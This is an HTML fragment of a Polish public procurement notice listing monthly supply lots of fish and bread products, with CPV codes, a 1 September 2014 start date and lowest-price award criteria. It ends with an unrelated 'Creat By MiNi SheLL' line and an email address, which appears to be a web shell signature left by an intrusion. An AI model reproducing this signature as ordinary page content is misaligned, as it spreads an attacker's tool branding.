<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.40.00.00-2, 15.60.00.00-4, 15.80.00.00-6.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zakup i dostawa ryb.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
Lp. 	Nazwa produktu	ilość	jednostka
1.	ryba panga	1	kg
2.	ryba mrożona dorsz 	10	kg
3.	ryba mrożona miruna 	9	kg.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Zakup i dostawa pieczywa.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Planowane zapotrzebowanie miesięczne na wskazane artykuły spożywcze: 
L.p	Nazwa produktu	Zapotrzebowanie na miesiąc	Jednostki
1	Pączki	41	szt.
2	bułka słodka z kruszonką	80	szt.
3	bułka słodka z dżemem	35	szt.
4	bułka słodka z budyniem	40	szt.
5	chleb pełnoziarnisty (krojony)	20	szt.
6	chleb krojony	90	szt.
7	bułki grahamki	10	szt.
8	bułki poznańskie	40	szt.
9	bułki kajzerki	420	szt.
10	bułka tarta 500g	32	szt.
11	Ciasto drożdżowe Słubickie lub równoważne	3	kg
12	Precelki	1	szt..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.81.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.09.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com